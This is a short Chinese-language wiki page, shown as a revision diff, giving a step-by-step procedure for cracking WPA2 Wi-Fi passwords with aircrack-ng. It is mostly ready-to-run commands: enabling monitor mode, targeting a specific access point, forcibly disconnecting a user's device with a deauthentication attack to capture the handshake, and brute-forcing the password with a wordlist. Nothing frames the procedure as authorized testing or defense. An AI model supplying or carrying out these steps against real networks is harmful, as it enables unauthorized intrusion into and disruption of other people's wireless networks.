Wifi-crack:修订间差异
小 导入1个版本 |
无编辑摘要 |
||
| 第69行: | 第69行: | ||
sudo airmon-ng stop wlan0mon | sudo airmon-ng stop wlan0mon | ||
[[分类:Crack]] | |||
2023年6月29日 (四) 09:07的最新版本
1. Install | 安装 aircrack-ng[编辑 | 编辑源代码]
sudo apt install aircrack-ng
2. 查看可用的无线网卡[编辑 | 编辑源代码]
sudo airmon-ng
3. 指定无线网卡开启监听模式[编辑 | 编辑源代码]
sudo airmon-ng start wlan0
4. 扫描附近的无线网络[编辑 | 编辑源代码]
airodump-ng wlan0mon
这一步会输出两个列表,两个列表不停在刷新。
第一个列表表示扫描到的无线网络 AP 信息,会用到以下几列信息:
- BSSID: 无线 AP 的硬件地址
- PWR: 信号强度,值是负数,绝对值越小表示信号越强
- CH: 无线网络信道
- ENC: 加密方式,我们要破解的是 WPA2
- ESSID: 无线网络的名称
第二个列表表示某个无线网络中和用户设备的连接信息:
- BSSID: 无线 AP 的硬件地址
- STATION: 用户设备的硬件地址
扫描列表会不停刷新,确定最终目标后按 Ctrl-C 退出。
5. 使用参数过滤扫描列表,确定扫描目标[编辑 | 编辑源代码]
使用命令:`airodump-ng -w <扫描结果保存的文件名> -c <无线网络信道> --bssid <目标无线 AP 的硬件地址> <处于监听模式的网卡名称>`
sudo airodump-ng -w android -c 6 --bssid 22:47:DA:62:2A:F0 wlan0mon
只有当扫描状态后面出现 ` ][ WPA handshake: 22:47:DA:62:2A:F0` 后,我们才拿到拿到进行破解的握手包。
扫描过程中如果有用户设备尝试连接 Wi-Fi 时,我们就会拿到握手包。
所以我们可以同时使用 `aireplay-ng` 对目标设备进行攻击,使其掉线重新连接,这样我们就拿到了握手包。
拿到握手包后按 Ctrl-C 结束扫描即可。
6. 使用 aireplay-ng 对目标设备发起攻击[编辑 | 编辑源代码]
使用命令:`aireplay-ng -<攻击模式> <攻击次数> -a 无线 AP 硬件地址> -c <用户设备硬件地址> <处于监听模式的网卡名称>`
sudo aireplay-ng -0 0 -a 22:47:DA:62:2A:F0 -c AC:BC:32:96:31:8D wlp8s0mon
发起攻击后,当 `airodump-ng` 成功拿到了握手包,使用 Ctrl-C 退出攻击。
7. 使用 aircrack-ng 暴力破解 Wi-Fi 密码[编辑 | 编辑源代码]
使用命令:`aircrack-ng -w 密码字典 <包含握手包的 cap 文件>`
aircrack-ng -w wpa-dictionary/common.txt android-01.cap
8. 无线网卡退出监听模式[编辑 | 编辑源代码]
使用命令:`airmon-ng stop <处于监听模式的网卡名称>`
sudo airmon-ng stop wlan0mon